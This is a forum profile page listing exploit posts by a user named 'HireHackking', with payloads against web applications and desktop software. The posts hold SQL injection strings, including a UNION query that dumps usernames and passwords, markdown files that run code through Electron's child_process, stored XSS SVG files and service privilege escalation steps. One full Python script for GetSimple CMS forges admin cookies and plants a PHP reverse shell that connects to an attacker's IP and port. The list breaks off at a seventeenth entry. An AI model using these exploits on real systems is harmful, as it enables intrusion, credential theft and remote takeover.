Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Affiliate Me Version 5.0.1 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    [#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection [#] Exploit Date: May 16, 2023. [#] CVSS 3.1: 6.4 (Medium) [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N [#] Tactic: Initial Access (TA0001) [#] Technique: Exploit Public-Facing Application (T1190) [#] Application Name: Affiliate Me [#] Application Version: 5.0.1 [#] Vendor: https://www.powerstonegh.com/ [#] Author: h4ck3r - Faisal Albuloushi [#] Contact: SQL@hotmail.co.uk [#] Blog: https://www.0wl.tech [#] Exploit: [path]/admin.php?show=reply&id=[Injected Query] [#] 3xample: [path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- - [#] Notes: - A normal admin can exploit this vulnerability to escalate his privileges to super admin.
  2. HireHackking

    Smart School v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Smart School v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018 # Demo Site: https://demo.smart-school.in # Tested on: Kali Linux # CVE: N/A ### Request ### POST /course/filterRecords/ HTTP/1.1 Host: localhost Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://localhost Referer: https://localhost/course/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1 ### Parameter & Payloads ### Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1
  3. HireHackking

    Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution # Date: 2023-04-27 # Exploit Author: 8bitsec # CVE: CVE-2023-31874 # Vendor Homepage: yank-note.com # Software Link: https://github.com/purocean/yn # Version: 3.52.1 # Tested on: [Ubuntu 22.04 | Mac OS 13] Release Date: 2023-04-27 Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement Technical Details & Description: A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload. Mac: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>"> Ubuntu: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>"> Opening the file in Yank Note will auto execute the Calculator application.
  4. HireHackking

    Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution # Date: 2023-04-24 # Exploit Author: 8bitsec # CVE: CVE-2023-31873 # Vendor Homepage: https://github.com/mariuskueng/gin # Software Link: https://github.com/mariuskueng/gin # Version: 0.7.4 # Tested on: [Mac OS 13] Release Date: 2023-04-24 Product & Service Introduction: Javascript Markdown editor for Mac Technical Details & Description: A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload: <video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Gin will auto execute the Calculator application.
  5. HireHackking

    LeadPro CRM v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LeadPro CRM v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578 # Demo Site: https://demo.leadifly.in # Tested on: Kali Linux # CVE: N/A ### Request ### GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1 Host: localhost Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8 X-Xsrf-Token: eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0= Referer: https://localhost/admin/product Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close ### Parameter & Payloads ### Parameter: filters (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10
  6. HireHackking

    Stackposts Social Marketing Tool v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 # Demo Site: https://demo.stackposts.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /spmo/auth/login HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://localhost/spmo/ Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */*; q=0.01 Content-Length: 104 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1* ### Parameter & Payloads ### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
  7. HireHackking

    GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) # Data: 18/5/2023 # Exploit Author : Youssef Muhammad # Vendor: Get-simple # Software Link: # Version app: 3.3.16 # Tested on: linux # CVE: CVE-2022-41544 import sys import hashlib import re import requests from xml.etree import ElementTree from threading import Thread import telnetlib purple = "\033[0;35m" reset = "\033[0m" yellow = "\033[93m" blue = "\033[34m" red = "\033[0;31m" def print_the_banner(): print(purple + ''' CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 '''+ reset) def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return None def api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return None def set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headers def get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return None def upload_shell(target, path, headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e) def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e) def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path) if __name__ == '__main__': print_the_banner() main()
  8. HireHackking

    Quicklancer v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Quicklancer v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 # Demo Site: https://quicklancer.bylancer.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /php/user-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic Content-Length: 93 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive action=searchStateCountry&dataString=deneme ### Parameter & Payloads ### Parameter: dataString (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
  9. HireHackking

    Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-04-15 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.bludit.com/ # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 # Version: 3.14.1 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31698 SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> save this SVG file xss.svg Steps to Reproduce: 1. At first login your admin panel. 2. then go to settings and click the logo section. 3. Now upload xss.svg file so your request data will be POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998 Referer: http://127.0.0.1/bludit/admin/settings Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i Content-Length: 651 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="tokenCSRF" 626c201693546f472cdfc11bed0938aab8c6e480 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="inputFile"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------15560729415644048492005010998-- 4. Now open the logo image link that you upload. You will see XSS pop up.
  10. HireHackking

    FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) # Date: 2023-05-24 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.squarepiginteractive.com # Software Link: https://www.fusioninvoice.com/store # Version: 2023-1.0 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50) # CVE: CVE-2023-25439 Description: A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and possibly others) it will be triggered once page gets loaded. Steps to reproduce: - Click on "Expenses", or "Tasks" and add (or edit an existing) one, - Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"), - Click on 'Save'. Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed. PoC Screenshots: https://imagebin.ca/v/7FOZfztkDs3I
  11. HireHackking

    ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) # Date: 2023-04-17 # Exploit Author: Rahad Chowdhury # Vendor Homepage: http://churchcrm.io/ # Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4 # Version: 4.5.4 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31699 Steps to Reproduce: 1. At first login your admin panel. 2. Then click the "Admin" menu and click "CSV Import '' and you will get the CSV file uploader option. 3. now insert xss payload in jpg file using exiftool or from image properties and then upload the jpg file. 4. you will see XSS pop up.
  12. HireHackking

    MobileTrans 4.0.11 - Weak Service Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://mobiletrans.wondershare.com/ # Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg # Version: MobileTrans version 4.0.11 # Tested on: Window 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31748 Vulnerability Description: MobileTrans is World 1 mobile-to-mobile file transfer application.MobileTrans version 4.0.11 was being suffered a weak service permission vulnerability that allows a normal window user to elevate to local admin. The "ElevationService" service name was installed, while the MobileTrans version 4.0.11 was installed in the window operating system. The service "ElevationService" allows the local user to elevate to the local admin as The "ElevationService" run with system privileges. Effectively, the local user is able to elevate to local admin upon successfully modifying the service or replacing the affected executable. C:\Users\HninKayThayar\Desktop>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe" C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
  13. HireHackking

    CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) # Date: 2023-02-02 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://civicrm.org # Software Link: https://civicrm.org/download # Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier) # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70) # CVE: CVE-2023-25440 Vendor Security Advisory: CIVI-SA-2023-05 Description: A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name field, it will be triggered once page gets loaded. Steps to reproduce: - Quick Add contact to CiviCRM, - Insert a payload PoC inside the field(s) - Click on 'Add contact'. If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.
  14. HireHackking

    Service Provider Management System v1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Service Provider Management System v1.0 - SQL Injection # Date: 2023-05-23 # Exploit Author: Ashik Kunjumon # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html # Version: 1.0 # Tested on: Windows/Linux 1. Description: Service Provider Management System v1.0 allows SQL Injection via ID parameter in /php-spms/?page=services/view&id=2 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit the latest vulnerabilities in the underlying database. Endpoint: /php-spms/?page=services/view&id=2 Vulnerable parameter: id (GET) 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/php-spms/?page=services/view&id=2 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql SQLMap Response: ---------------------- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
  15. HireHackking

    Zenphoto 1.6 - Multiple stored XSS

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Zenphoto 1.6 - Multiple stored XSS Application: Zenphoto-1.6 xss poc Version: 1.6 Bugs: XSS Technology: PHP Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/ Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/ ===================================================== ###XSS-2### steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users) 2.change postal code as <script>alert(4)</script> 3.if admin user information import as html , xss will trigger poc video : https://youtu.be/JKdC980ZbLY
  16. HireHackking

    WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) Version: 1.6.1 Bugs: XSS Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: localhost Content-Length: 976 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167 Connection: close ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="reqid" 187de34ea92ac ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="mtime[]" 1683056102 ------WebKitFormBoundary5u4r3pOGl4EnuBtO-- 3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg) ======================================================================================================================== ###XSS-2### 1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages) 2. add page 3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E) payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E poc request: POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1 Host: localhost Content-Length: 143 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475 Connection: close page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save 4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
  17. HireHackking

    Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation

